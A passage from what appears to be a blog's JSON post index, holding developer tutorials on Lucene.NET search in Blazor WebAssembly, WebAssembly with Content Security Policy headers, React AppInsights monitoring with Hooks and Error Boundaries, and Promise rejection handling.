Search.Site.SearchComponent so our Component uses the right base class.\nIt’s now time to start up the server, let’s do it in watch mode so we can keep developing:\n1 dotnet watch run Once the server is up you can navigate to http://localhost:5000 and see the initalisation message!\nStep 5 - Integrating Lucene.NET Our WASM application my be up and running but it’s not doing anything yet and we want it to connect to Lucene.NET to allow us to search. Before we do that though I just want to cover off some of the basics of Lucene.NET.\nLucene.NET 101 Lucene.NET is a port of the Java Lucene project which is a powerful, highly-performant full-text search engine. With it, you can create search indexes, tokenize “documents” into it and search against it using a variety of query styles. The .NET port is an API-compatible port, meaning that the docs for Lucene-Java apply to Lucene.NET. There are a few core pieces that we need to understand to get started.\nLucene centres around a Directory, this is the location where the search index is stored, what you write to with an IndexWriter and query against with an IndexSearcher. Everything stored in Lucene is called a Document which is made up of many different fields, each field can be tokenized for access and weighted differently to aid in searching. When it comes to searching you can query the document as a whole, or target specific fields. You can even adjust the weight each token has in the query and how “fuzzy” the match should be for a token. An example query is:\ntitle:react tag:azure^5 -title:DDD Sydney This query will match documents that contain react in the title or azure in the tags excluding any that contain DDD Sydney in the title. The results will then be weighted so that any tagged with azure will be higher up the results list. So you can see how this can be powerful.\nIf you want to learn more about Lucene I’d recommend checking out the Lucene docs and some of my past posts as it’s much more powerful a tool than I want to cover here.\nCreating Our Index We need to add some packages to our project so that we can start using Lucene.NET and we’re going to use the 4.8 release as it supports netstandard2.0, and thus .NET Core. At the time of writing, this is still in beta and we’re using the 4.8.0-beta00006 release. We’ll start by adding the core of Lucene.NET and the analyzer package to Search.Site:\n1 2 dotnet add package Lucene.Net --version 4.8.0-beta00006 dotnet add package Lucene.Net.Analysis.Common --version 4.8.0-beta00006 To create our index we’ll need to create a directory for Lucene.NET to work with, now normally you would use FSDirectory but that requires a file system and we’re running in the WebAssembly sandbox so that’ll be a problem right? It turns out not, for the System.IO API’s used by Blazor (via the mono runtime) map to something in memory (I haven’t worked out just how yet, the mono source code is a tricky thing to trace through).\nNote: You may notice that we’re going to hit up against an issue, everything is in memory. This is a limitation of how we have to work, after all, we’re still in a browser, but it does mean the index is created each page load. In a future post we’ll look at how to do some optimisations to this.\nThe entry point that we want to use for our Component is the OnInitializedAsync as it gives us a convenient point to create the directory and start loading our JSON file into the index, but how will we get the JSON? Via a fetch of course, but since this is .NET, we’ll use HttpClient and inject that as a property of the Component:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 namespace Search.Site open Microsoft.AspNetCore.Components open SearchResult open FSharp.Control.Tasks.V2 open Lucene.Net.Store open Lucene.Net.Index open System open System.Net.Http module Task = let Ignore(resultTask: Task<_>): Task = upcast resultTask type SearchComponent() = inherit ComponentBase() let mutable dir: FSDirectory = null let mutable reader: IndexReader let mutable http: HttpClient = null member val IndexLoaded = false with get, set member val SearchTerm = "" with get, set member val SearchResults = Array.empty<Post> with get, set member this.Search() = ignore() [<Inject>] member _.Http with get () = http and set value = http <- value override this.OnInitializedAsync() = task { let! indexData = Http.GetJsonAsync<SearchData>("https://www.aaron-powell.com/index.json") dir <- FSDirectory.Open(Environment.CurrentDirectory) reader <- DirectoryReader.Open dir } |> Task.Ignore Now it’s time for the fun to start, let’s build an index! I’m unpacking the JSON into a type defined in F# that maps to the properties of the JSON object and it’s an array so we can iterate over that.\nNote: The System.Json package doesn’t work well with F# record types so I’m using FSharp.SystemTextJson to improve the interop. I’ve also created a custom converter for DateTimeOffset that handles some invalid dates in my post archive.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 override this.OnInitializedAsync() = task { let! indexData = Http.GetJsonAsync<SearchData>("https://www.aaron-powell.com/index.json") dir <- FSDirectory.Open(Environment.CurrentDirectory) reader <- DirectoryReader.Open dir let docs = indexData.Posts |> Array.map (fun post -> let doc = Document() let titleField = doc.AddTextField("title", post.title, Field.Store.YES) titleField.Boost <- 5.f doc.AddTextField("content", post.content, Field.Store.NO) |> ignore doc.AddStringField("url", post.url, Field.Store.YES) |> ignore let descField = doc.AddTextField("desc", post.description, Field.Store.YES) descField.Boost <- 2.f doc.AddStringField("date", DateTools.DateToString(post.date.UtcDateTime, DateTools.Resolution.MINUTE), Field.Store.YES) |> ignore post.tags |> Array.map (fun tag -> StringField("tag", tag, Field.Store.YES)) |> Array.iter doc.Add doc :> IEnumerable<IIndexableField>)) let analyzer = new StandardAnalyzer(LuceneVersion.LUCENE_48) let indexConfig = IndexWriterConfig(LuceneVersion.LUCENE_48, analyzer) use writer = new IndexWriter(dir, indexConfig) writer.AddDocuments docs } |> Task.Ignore This might look a bit clunky but essentially it is creating a Document, adding some fields and returning it cast a IEnumerable<IIndexableField> before creating an analyzer and a writer to write the index.\nLet’s look closely at a few lines:\n1 2 let titleField = doc.AddTextField("title", post.title, Field.Store.YES) titleField.Boost <- 5.f Here we’re creating the field to store the title of the post. It’s created as a TextField, which is a type of field in Lucene that contains multiple terms that need tokenization. This is different from the StringField which expects the value to be treated as a single token (and why we use it for the tags). This means we can search for each word in the title “Implementing Search in Blazor WebAssembly With Lucene.NET” rather than treating it as a whole string.\nYou’ll also notice that this field is stored, denoted by Field.Store.YES, compared to Field.Store.NO of the content. The difference here is on the retrievability of the value. A stored value can be retrieved by a query whereas a non-stored value can’t be. A stored value is also going to take more space up and be slower to access, which is why you want to be selective about what you store in the original format.\nLastly, we’re setting a Boost on this field of 5, meaning that any term that’s found in this field is 5 times more relevant than the same term in a different field. Boosting the field means that if you were to search for react OR azure documents that contain either in the title will be ranked higher in the results than ones that only contain those terms in the content.\nLet’s look at storing the tags:\n1 2 3 post.tags |> Array.map (fun tag -> StringField("tag", tag, Field.Store.YES)) |> Array.iter doc.Add This time we’ve used StringField since it’s only a single term but we aren’t boosting, although it seems like we should, tags are pretty important. Since we’re using the StringField which doesn’t get analyzed we can’t boost it, instead, we’ll boost at search time.\nOnce all the posts are turned into documents it’s time to write them to the index and that’s what these 4 lines do:\n1 2 3 4 let analyzer = new StandardAnalyzer(LuceneVersion.LUCENE_48) let indexConfig = IndexWriterConfig(LuceneVersion.LUCENE_48, analyzer) use writer = new IndexWriter(dir, indexConfig) writer.AddDocuments docs When writing a document to an index the fields are analyzed so Lucene knows how to build the index. We’re using the StandardAnalyzer here which combines a few common scenarios, ignoring “stop words” (this, the, and, etc.), removal of . and ' and case normalisation. I have a bit more in-depth information in my post about Lucene analyzers, but this one works for common scenarios on English content. With the analyzer we create an IndexWriter and write the documents to the index, creating something we can search against.\nStep 6 - Searching With the index being created when our Component is loaded the last thing we need is to handle the search and that means filling out the Search function. We’re also going to need another NuGet package for constructing the query:\n1 dotnet add package Lucene.Net.QueryParser --version 4.8.0-beta00006 And now construct the query:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 member this.Search() = match this.SearchTerm with | "" -> ignore() | term -> use analyzer = new StandardAnalyzer(LuceneVersion.LUCENE_48) let qp = MultiFieldQueryParser (LuceneVersion.LUCENE_48, [| "title"; "content"; "tag"; "desc" |], analyzer, dict [ "title", 1.f "tag", 5.f "content", 1.f "desc", 1.f ]) qp.DefaultOperator <- Operator.OR let query = qp.Parse <| term.ToLowerInvariant() let searcher = IndexSearcher reader let sorter = Sort(SortField.FIELD_SCORE, SortField("date", SortFieldType.STRING)) let topDocs = searcher.Search(query, 20, sorter) match topDocs.ScoreDocs.Length with | 0 -> Array.empty | _ -> let maxScore = topDocs.ScoreDocs |> Array.map (fun hit -> (hit :?> FieldDoc).Fields.[0] :?> float32) |> Array.max let res = topDocs.ScoreDocs |> Array.map (fun hit -> let doc = searcher.Doc hit.Doc let score = (hit :?> FieldDoc).Fields.[0] :?> float32 { Score = score / maxScore Title = doc.Get "title" Url = doc.Get "url" Description = doc.Get "desc" Tags = doc.Fields |> Seq.filter (fun f -> f.Name = "tag") |> Seq.map (fun f -> f.GetStringValue()) |> Seq.toArray }) this.SearchResults <- res Well then, that’s… long… let’s break it down. We start with a match expression to ensure there was something to search on, if there isn’t then just ignore, otherwise we need to construct a query.\n1 2 3 4 5 6 7 8 9 let qp = MultiFieldQueryParser (LuceneVersion.LUCENE_48, [| "title"; "content"; "tag"; "desc" |], analyzer, dict [ "title", 1.f "tag", 5.f "content", 1.f "desc", 1.f ]) qp.DefaultOperator <- Operator.OR Since users won’t understand the structure of our search index internally we want to make it easy for them to search and to do that we’re using a Query Parser, in particular, the MultiFieldQueryParser which helps with the construction of queries across multiple fields. After specifying the Lucene version to use we then provide an array of fields to search against (title, content, tag and desc) and then provide a weight for each of the fields. Remember earlier I said we could weight tag because it wasn’t tokenized, well this is how we weight it, by providing a dictionary (IDictionary<string, float>) where the key is the field and the value is the weight. Annoyingly we need to provide each field regardless of whether we want to boost it, but that’s how the API works.\nLastly, we set the default operator for the parsed queries to be an OR operator rather than AND, allowing us to cast a wider nett in our search.\nWith the parser ready we can search the index:\n1 2 3 4 5 let query = qp.Parse <| term.ToLowerInvariant() let searcher = IndexSearcher reader let sorter = Sort(SortField.FIELD_SCORE, SortField("date", SortFieldType.STRING)) let topDocs = searcher.Search(query, 20, sorter) Here we’ll use a custom sorter that sorted first on the “score” (how good a match was it) then by the date (newest posts are more relevant). Using a custom sorter does pose a challenge though. When a search is done you receive a score for each document, this is produced by quite a complex algorithm (taking into account term count, boosts, etc.) and the bigger the number the higher in the results it’ll appear. But when a custom sorter is applied the score is no longer the only value of importance and it means if you want to show a “% match” for the document, it’s not so straight forward. So let’s have a look at how we build the results and their scores.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 let maxScore = topDocs.ScoreDocs |> Array.map (fun hit -> (hit :?> FieldDoc).Fields.[0] :?> float32) |> Array.max let res = topDocs.ScoreDocs |> Array.map (fun hit -> let doc = searcher.Doc hit.Doc let score = (hit :?> FieldDoc).Fields.[0] :?> float32 { Score = score / maxScore Title = doc.Get "title" Url = doc.Get "url" Description = doc.Get "desc" Tags = doc.Fields |> Seq.filter (fun f -> f.Name = "tag") |> Seq.map (fun f -> f.GetStringValue()) |> Seq.toArray }) Initially we go through all the matched docs (well, the top 20 which we limited to) and cast them to FieldDoc then extract the first field value, which is our score (cast as a float32) (we know that will be the score because of its position in the sorter) and find the largest one.\nNext we can iterate through the matched documents which gives us an object with the document it, hit.Doc, that we’ll ask the searcher to retrieve the document using. We have to ask the searcher because the document ID is in the context of the query performed.\nWith the document we can extract the stored fields, build our search results object and return it to the UI.\nSearch In Action We’re done now!\nFor this demo above I’ve kept a debugging message where I dumped out the query that was parsed to the console so you can see what was being sent to Lucene.NET to produce the results.\nConclusion I have to admit that when I started trying to build this I didn’t expect it to work. It felt like a rather crazy idea to use what is quite a complex library and compile it to WebAssembly, only to have it “just work”.\nBut as this post (hopefully) demonstrates, it’s not that hard to add search to a Blazor WebAssembly project, I spent more time trying to remember how to use Lucene.NET than I did building the application!\nAnd do you know what’s cool? I now have search on my site now!\nThe way that I have it built is a little different to what I’ve described above, but I’ll save some of those advanced concepts for the next post.\n", "id": "2019-11-29-implementing-search-in-blazor-webassembly-with-lucenenet" }, { "title": "Using WebAssembly With CSP Headers", "url": "https://www.aaron-powell.com/posts/2019-11-27-using-webassembly-with-csp-headers/", "date": "Wed, 27 Nov 2019 11:39:21 +1100", "tags": [ "wasm", "javascript" ], "description": "Have you setup Content Security Policies? Do you want to use WebAssembly? Well here's what you need to do", "content": "This year I’ve been doing a bit with WebAssembly, aka WASM, (see tags: wasm) and I’ve been wanting to upload some experiments to my blog. Simple enough, since my website is a static website I just drop in some files to the right folder, upload them with the rest of the website and it just works. Right?\nEnter CSP When I redid my blog as a static website a few years ago I decided that I’d look into having some proper security policies in place for a static site, in the form of Content Security Policy Headers, or CSP Headers. Scott Helme has a great CSP Cheat Sheet if you’re wanting to get started learning about CSP and why it can be valuable to include. I combined this with Report URI, a service that Scott runs, to monitor potentially malicious attacks on my website.\nWhy CSP My site is pretty much read-only, so why would I want CSP on it? Well, the main reason is to get a bit of experience in how to set up CSP, maintain it as a site evolves and generally learn about good security practices for web applications. I have noticed a bonus side effect of it though, because I have to whitelist everything that’s happening on my site I naturally block a lot of stuff that I didn’t know was being injected, such as the Disqus ads! I use Disqus for comments but their ads are served off a different domain to the comment engine, and I’ve never whitelisted that domain, so my site doesn’t have the clickbait sponsored junk all over the bottom of the post!\nI have a rather long CSP in place, you’ll see it if you look into the network requests of your browsers and it does the job nicely. So when I added some WASM to my blog and went to the page I didn’t expect it to fail.\nWASM + CSP After deploying everything and it wasn’t working I opened the dev tools only to find this error:\nWasm code generation disallowed by embedder\nUmm… ok…? That’s a new one to me, I’ve never hit that problem on any of my projects before and it worked on dev, so there must be something different in production, of which the only difference is the CSP headers.\nA bit of research led me to this proposal in the WebAssembly spec. It turns out that because WASM creates a nice little sandbox for apps to play in that also means there’s a nice little sandbox for malicious actors to play in too, and we don’t want that. The proposal is to introduce some new directives into CSP specifically to allow WASM to be executed, but at the moment it can be handled by using the unsafe-eval against script-src. Now, this is risky as you’re punching a rather large hole in your CSP protection, so I’d recommend that you only add that directive to paths that specifically need it, not just every path on your site. But once it’s in place you’re WebAssembly code will be executable!\nConclusion CSP headers are a good idea to have in place, regardless of how complex your site is or what the risk of malicious actors poses to it, it’s better to do security-by-default than as an afterthought, but you will need to watch out if you’re trying to combine this with WebAssembly.\nAt present you need to use unsafe-eval in the script-src (at a minimum) until the wasm-unsafe-eval directive lands.\nNow go forth and be secure!\n", "id": "2019-11-27-using-webassembly-with-csp-headers" }, { "title": "Combining React Hooks With AppInsights", "url": "https://www.aaron-powell.com/posts/2019-11-19-combining-react-hooks-with-appinsights/", "date": "Tue, 19 Nov 2019 11:40:02 +1100", "tags": [ "react", "azure", "javascript" ], "description": "A look at how to create a custom React Hook to work with AppInsights", "content": "The introduction of Hooks into React 16.8 changed the way that people thought about creating components to with within the React life cycle.\nWith the AppInsights React plugin you get a good starting point for integrating AppInsights but it uses a Higher Order Component (HOC) and a custom plugin, and I wanted something that’d integrate nicely into the Hooks pattern. So let’s take a look at how you can go about building that.\nReact Context Before creating my custom Hook I wanted to have a more React way in which I could access AppInsights, so let’s create a React Context to use as a starting point. This will make the plugin available to all children components, and in theory, allow you to have different plugin configurations through different contexts (we won’t try that out, but it’s an idea that you may want to explore yourself). Admittedly, you don’t need to create a Context to expose the plugin, but I just like the way the programmatic model comes together as a result of it.\nWe’ll set up the AppInsights instance like we did in the first article of the series and export the reactPlugin from it as well (previously we’d only exported the AppInsights instance):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import { ApplicationInsights } from "@microsoft/applicationinsights-web"; import { ReactPlugin, withAITracking } from "@microsoft/applicationinsights-react-js"; import { globalHistory } from "@reach/router"; const reactPlugin = new ReactPlugin(); const ai = new ApplicationInsights({ config: { instrumentationKey: process.env.APPINSIGHTS_KEY, extensions: [reactPlugin], extensionConfig: { [reactPlugin.identifier]: { history: globalHistory } } } }); ai.loadAppInsights(); export default Component => withAITracking(reactPlugin, Component); export const appInsights = ai.appInsights; export { reactPlugin }; Now we can start creating our Context. Let’s start with a new file called AppInsightsContext.js:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 import React, { createContext } from "react"; import { reactPlugin } from "./AppInsights"; const AppInsightsContext = createContext(reactPlugin); const AppInsightsContextProvider = ({ children }) => { return ( <AppInsightsContext.Provider value={reactPlugin}> {children} </AppInsightsContext.Provider> ); }; export { AppInsightsContext, AppInsightsContextProvider }; Great, you have the context ready for use and we have a component that sets up the reactPlugin for us when we use it. The last thing to do is to use it within our application somewhere.\nLike in the first post, we’ll update the Layout/index.js file so that we set the context up as high as we can:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 const LayoutWithContext = ({ location, children }) => ( <AppInsightsContextProvider> <> <Headroom upTolerance={10} downTolerance={10} style={{ zIndex: "20", height: "6.5em" }} > <Header location={location} /> </Headroom> <Container text>{children}</Container> <Footer /> </> </AppInsightsContextProvider> ); 🎉 Context is now in use and all children components are able to access it within our children components. And if we wanted to use the standard page interaction tracking of the React plugin we can combine this with the HOC:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import React from "react"; import Headroom from "react-headroom"; import { Container } from "semantic-ui-react"; import Footer from "../Footer"; import Header from "../Header"; import "semantic-ui-css/semantic.min.css"; import { AppInsightsContextProvider } from "../../AppInsightsContext"; import withAppInsights from "../../AppInsights"; const Layout = withAppInsights(({ location, children }) => ( <> <Headroom upTolerance={10} downTolerance={10} style={{ zIndex: "20", height: "6.5em" }} > <Header location={location} /> </Headroom> <Container text>{children}</Container> <Footer /> </> )); const LayoutWithContext = ({ location, children }) => ( <AppInsightsContextProvider> <Layout location={location} children={children} /> </AppInsightsContextProvider> ); export default LayoutWithContext; Exposing Context as a Hook The final thing we can do with our new Context-provided reactPlugin is to make it easier to access it and to do that we’ll use the useContext Hook. To do this it’s a simple matter of updating AppInsightsContext.js:\n1 const useAppInsightsContext = () => useContext(AppInsightsContext); Our first Hook is ready!\nCreating a Hook for Tracking Events With Context ready we can make some custom Hooks to use within our application. The Hook that we’ll create is going to be a generic one so we can use it in multiple scenarios and work with the trackEvent method. Our Hook will take a few pieces of information, the reactPlugin instance to use, the name of the event (which will appear in AppInsights) and some data to track.\n1 2 const useCustomEvent = (reactPlugin, eventName, eventData) => ({}); export default useCustomEvent; Primarily, we’ll need to use the useEffect Hook to call AppInsights, let’s implement taht:\n1 2 3 4 5 6 7 import { useEffect } from "react"; const useCustomEvent = (reactPlugin, eventName, eventData) => { useEffect(() => { reactPlugin.trackEvent({ name: eventName }, eventData); }, [reactPlugin, eventName, eventData]); }; export default useCustomEvent; We’re also making sure that we follow the Rules of Hooks and specifying the dependencies of the useEffect Hook so if they update the effect will run.\nThe first place we’ll use the Hook is on the Add To Cart button, like we did in the first article:\n1 2 3 4 5 6 7 8 9 const AddToCart = ({productId}) => { const [loading, setLoading] = useState(false) const [error, setError] = useState('') const [quantity, setQuantity] = useState(1) const [visible, setVisible] = useState(false) const {addToCart} = useContext(CartContext) const reactPlugin = useAppInsightsContext() useCustomEvent(reactPlugin, 'Added to Cart', quantity) // snip But wait, we have a problem here, now every time the quantity state changes our Effect will run, not when you click the button (or some other controlled action). This isn’t ideal since it’s an input field, so instead, we need to think differently about how to trigger the Effect.\nAdding More Hooks To solve this we’ll add more Hooks! In particular, we’ll add the useState Hook to our custom one.\n1 2 3 4 5 6 7 8 9 10 11 import { useState, useEffect, useRef } from "react"; export default function useCustomEvent(reactPlugin, eventName, eventData) { const [data, setData] = useState(eventData); useEffect(() => { reactPlugin.trackEvent({ name: eventName }, data); }, [reactPlugin, data, eventName]); return setData; } We’ll create some internal state, which I’ve called data, and initialise it with whatever we pass as the eventData. Now in our dependencies we’ll stop using eventData and use data then return the setData state mutation function from our Hook. With this change we will update our usage in Add to Cart like so:\n1 2 3 4 5 6 7 8 9 const AddToCart = ({productId}) => { const [loading, setLoading] = useState(false) const [error, setError] = useState('') const [quantity, setQuantity] = useState(1) const [visible, setVisible] = useState(false) const {addToCart} = useContext(CartContext) const reactPlugin = useAppInsightsContext() const trackAddedToCart = useCustomEvent(reactPlugin, 'Added to Cart') // snip We now have a function that is in the variable trackAddedToCart that can be used at any point in our component to trigger off the effect:\n1 2 3 4 5 6 7 8 9 10 // snip Moltin.addToCart(cartId, productId, quantity).then(() => { addToCart(quantity, cartId); setLoading(false); setQuantity(quantity); setVisible(true); toggleMessage(); trackAddedToCart({ quantity, cartId, productId }); }); // snip Here once the cart has successfully been updated we track the event with some data that we want.\nIgnoring Unwanted Effect Runs If you were to start watching your AppInsight logs now you’ll see that you’re receiving events for the interaction, but you’re also receiving other tracking events from when the component first renders. That isn’t ideal is it! Why does this happen? well, the Effect Hook is similar to componentDidUpdate but also componentDidMount, meaning that the Effect runs on the initial pass, which we may not want it to do, especially if the Effect is meant to be triggered by a certain action in our component.\nThankfully, there’s a solution for this and that is to use the useRef Hook. We’ll update our custom Hook to allow us to set whether we want the componentDidMount-equivalent life cycle to trigger the effect or not:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import { useState, useEffect, useRef } from "react"; export default function useCustomEvent( reactPlugin, eventName, eventData, skipFirstRun = true ) { const [data, setData] = useState(eventData); const firstRun = useRef(skipFirstRun); useEffect(() => { if (firstRun.current) { firstRun.current = false; return; } reactPlugin.trackEvent({ name: eventName }, data); }, [reactPlugin, data, eventName]); return setData; } The argument, skipFirstRun, will be defaulted to true and we create a ref using that value. Then when the Effect runs we check if we are to skip the first run, we update the ref and return early from the function. This works because the ref mutation doesn’t notify changes to the component and thus it won’t re-render.\nConclusion Throughout this post we’ve had a look at how to use Hooks with AppInsights to create a programmatic model that feels like how we would expect a React application to work.\nWe started by introducing Context so that we can resolve the React AppInsights plugin through the React component structure rather than treating it as an external dependency. Next, we created a custom Hook that allows us to track events through the Hook life cycle and learnt a bit about how the Hooks can be triggered and what to do to handle them in the smoothest way possible.\nYou’ll find the sample I used in this post on GitHub with the custom Hook, Add to Cart component and a second usage on the Remove from Cart page.\nAt the time of writing the AppInsights React plugin doesn’t provide a method trackEvent, so I patched it myself when initializing the plugin:\n1 2 3 ReactPlugin.prototype.trackEvent = function(event, customProperties) { this._analyticsPlugin.trackEvent(event, customProperties); }; Bonus Feature - Track Metrics via Hooks The React plugin provides a HOC for tracking metrics such as interaction with a component, so I thought, why not look to see if we can do that with a Hook?\nTo do that I’ve created another custom Hook, useComponentTracking that simulates what the HOC was doing, but doesn’t inject a DOM element, you need to attach it to the element(s) yourself. I’ve updated the Layout component to show how it would work too.\n", "id": "2019-11-19-combining-react-hooks-with-appinsights" }, { "title": "Using React Error Boundaries With AppInsights", "url": "https://www.aaron-powell.com/posts/2019-10-24-using-react-error-boundaries-with-appinsights/", "date": "Thu, 24 Oct 2019 09:02:43 +1100", "tags": [ "react", "azure", "javascript" ], "description": "Combining React Error Boundaries with AppInsights for automatic error logging", "content": "Error Boundaries is a new feature introduced in React 16 to better handle unexpected errors that happen when a component tree is attempting to render.\nThe goal of Error Boundaries is to ensure that when an error does occur during render React has a way to catch that error in a component and handle it gracefully, rather than the component tree being broken and resulting in a white screen for the user. This all works by using a new lifecycle method on a Component called componentDidCatch:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 class ErrorBoundary extends React.Component { state = { hasError: false }; componentDidCatch(error, info) { this.setState({ hasError: true }); } render() { if (this.state.hasError) { return <h1 className="error">Error!</h1>; } return this.props.children; } } const App = () => ( <ErrorBoundary> <SomeComponent /> </ErrorBoundary> ); The componentDidCatch method receives two pieces of information, the error that was thrown and info which is the component stack trace. This sounds like information that would be really great for us to track in an error monitoring platform, like, say AppInsights!\nDesigning Our Component Let’s create a generic “App Insights Aware Error Boundary” component, which will allow us to place a boundary somewhere in our component tree but also be generic enough to use in multiple places. After all, we don’t want a single error boundary, that’d be akin to wrapping the whole application with a try/catch block and make it harder to handle errors-at-the-source.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import React from "react"; import { SeverityLevel } from "@microsoft/applicationinsights-web"; class AppInsightsErrorBoundary extends React.Component { state = { hasError: false }; componentDidCatch(error, info) { this.setState({ hasError: true }); this.props.appInsights.trackException({ error: error, exception: error, severityLevel: SeverityLevel.Error, properties: { ...info } }); } render() { if (this.state.hasError) { const { onError } = this.props; return typeof onError === "function" ? onError() : React.createElement(onError); } return this.props.children; } } Our component will take two props, appInsights and onError. The first is the AppInsights instance you would initialise within an application, as we did in the last post, the other is the component to render or a function to return a component.\nUsing Our Error Boundary I’ve created a demo application using the Gastby eCommerce starter kit (like last time) that shows how you can use an Error Boundary (source code is on my GitHub).\nSince it turns out it’s hard to create a reproducible error in a well-written application I’ve created a fake error scenario, basically whenever you try to add more than 1 item to the cart it’ll throw an error during render (error in codebase).\nBefore seeing the error boundary in action, what would it look like if we didn’t have one?\nWithout the error boundary, we end up with a blank screen because the whole component tree has become corrupt.\nNow we wrap our “buggy” component with an error boundary and if we click the ‘Add to Cart’ button we successfully added to cart, but if when you try to increase the number in the text box it throws an error and the error boundary is displayed.\nHow does that look in code? Well, we wrap the component we want with the error boundary (source):\n1 2 3 <ErrorBoundary onError={() => <h1>I believe something went wrong</h1>}> <AddToCart productId={id} /> </ErrorBoundary> Because I’ve got a really basic component to put in when there’s an error, I’m just created an inline function component, but you might want to provide a proper component reference instead.\nInspecting Errors in AppInsights By logging into the Azure Portal and navigating to your AppInsights resource you’ll be able to filter the data to the exceptions you’ve captured:\nThe information might be a little tricky to read if you’re using a minified bundle, but to help with that you can upload your Source Map and have it help give you more detailed information in the logs!\nConclusion AppInsights will automatically capture unhandled errors that reach the onError event in the browser, but when using React you want to do something that’ll allow you to handle the component tree failing to render, which is where Error Boundaries come into play. We can then combine this with AppInsights to have our Error Boundary log those handled errors, you could even provide additional information to the properties of the tracked events if desired.\n", "id": "2019-10-24-using-react-error-boundaries-with-appinsights" }, { "title": "Stateless Serverless with Durable Functions", "url": "https://www.aaron-powell.com/posts/2019-10-23-stateless-serverless-with-durable-functions/", "date": "Wed, 23 Oct 2019 16:00:50 +1100", "tags": [ "serverless", "azure-functions" ], "description": "Here's a video of my Serverless Days Melbourne talk on Durable Functions", "content": "In August I was lucky enough to be invited to speak at Serverless Days Melbourne on the topic of Durable Functions.\nIf you want to check out the talk, the video is online.\n", "id": "2019-10-23-stateless-serverless-with-durable-functions" }, { "title": "Catching All Promise Errors", "url": "https://www.aaron-powell.com/posts/2019-10-11-catching-all-promise-errors/", "date": "Fri, 11 Oct 2019 19:21:50 +1100", "tags": [ "javascript" ], "description": "When a Promise falls in the woods and no one is there to catch it, does it error?", "content": "Recently I was looking into monitoring static websites and it got me thinking about global error handling. There’s a good chance that you’ve come across the onerror global handler that’s triggered when an error happens and there’s no try/catch around it. But how does this work when working with Promises?\nPromise Error Handling Let’s take this example:\n1 2 3 4 5 6 7 8 9 10 11 function getJson() { return fetch('https://url/json') .then(res => res.json()); } // or using async/await function async getJsonAsync() { const res = await fetch('https://url/json'); const json = await res.json(); return json; } There are two errors that could happen here, the first is a network failure and the other is the response isn’t valid JSON (side note, fetch doesn’t return an error on a 404 or 500 respose), but we’re not doing anything to handle those errors so we’d need to rewrite it like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 function getJson() { return fetch('https://url/json') .then(res => res.json()) .catch(err => console.log(err)); } // or using async/await function async getJsonAsync() { try { const res = await fetch('https://url/json'); const json = await res.json(); return json; } catch (e) { console.error(e); } } Now we are handling the rejection and our application is all the happier for it.\nHandling the Unhandled In an ideal world, you’re handling all errors that an application may have, but in reality that’s not the case, there will be errors that were not planned for, which is why we have onerror. But, onerror is for handling errors that didn’t occur within a Promise, for that we need to look elsewhere.\nPromises don’t error per se, they reject (which can represent an error or just being unsuccessful), and that rejection may be unhandled which will result in the unhandledrejection event being triggered.\nonunhandledrejection can be assigned directly off window like so:\n1 2 3 window.onunhandledrejection = function (error) { console.error(`Promise failed: ${error.reason}`); }; This is similar to onerror, but it doesn’t have quite as much information provided. All you receive in this event handler is the Promise that failed and the “reason” provided to the rejection. This does mean that you don’t get some useful information like source file or line number, but that’s a trade-off because it’s come from an async operation.\nYou can also call preventDefault on the error object which will prevent writing to console.error, which can be useful if you want to avoid leaking information to the debug console.\nHandling the Handled While you can capture unhandled rejections you can also capture handled rejections using the rejectionhandled event. While I find it annoying that it’s an inconsistent name (Rejection Handled to go along with Unhandled Rejection, why aren’t they consistent with where the word Rejection is!) this event handler works the same as the other one but will be triggered when a catch handled is provided.\nThis handler is useful if you’re doing a monitoring platform you might want to log all rejections, handled or not.\nConclusion If you’re building an application you should always look to include global error handling. It’s very common to handle onerror but it’s quite easy to forget about global error handling for Promises and that’s easy to do with onunhandledrejection.\n", "id": "2019-10-11-catching-all-promise-errors" }, { "title": "Implementing Monitoring in React Using AppInsights", "url": "https://www.aaron-powell.com/posts/2019-10-04-implementing-monitoring-in-react-using-appinsights/", "date": "Fri, 04 Oct 2019 09:00:02 +1000", "tags": [ "react", "azure", "javascript" ], "description": "Monitoring of SPA's is important, so let's look at how to do that in a React app using AppInsights", "content": "When I was consulting something that was done early on in many projects was to integrate some monitoring/logging platform. This would be used to help give insights into common scenarios such as how long IO took, trace data flows within the application or handling expected and unexpected errors. All of this would be baked into our API endpoints and generally just ran smoothly.\nBut there would always be one place that it wasn’t prioritized, the browser. Sometimes Google Analytics would be integrated (or if you wanted some real fun do it with plain old CSS), but that was more if it was a public website/marketing site, and really only focused on traffic sources, not true monitoring.\nToday, I wanted to have a look at how we can setup up a monitoring solution of React using Azure AppInsights.\nWhat is AppInsights AppInsights (Application Insights in its long-form) is part of the Azure Monitor platform and is a performance monitoring platform that can be used in applications from web to mobile, across a number of languages.\nWhile I won’t cover all the features of it here, the most interesting features that it has for a web application (SPA or otherwise) is capturing information such as page views, errors (handled and unhandled) and AJAX calls (XML HTTP Request and Fetch). Combining this both client and server can make it useful to provide a full view of a user’s interactions on your site.\nGetting Started For this demo I’m using a Gatsby e-commerce starter kit and you’ll find the completed demo on my GitHub.\nI’ve extended it to use the JavaScript SDK for AppInsights which just so happens to have a React extension.\nConfiguring AppInsights First things first, we need to have an AppInsights instance which we can use, and to do that you’ll need to create a resource in Azure (if you don’t already have an Azure account you can sign up for a free trial) and copy the instrumentation key.\nOnce you have the instrumentation key create a .env.development file to set up the environment variable that Gatsby will look for:\n1 APPINSIGHTS_KEY=<instrumentation key here> Now we’re ready to start integrating 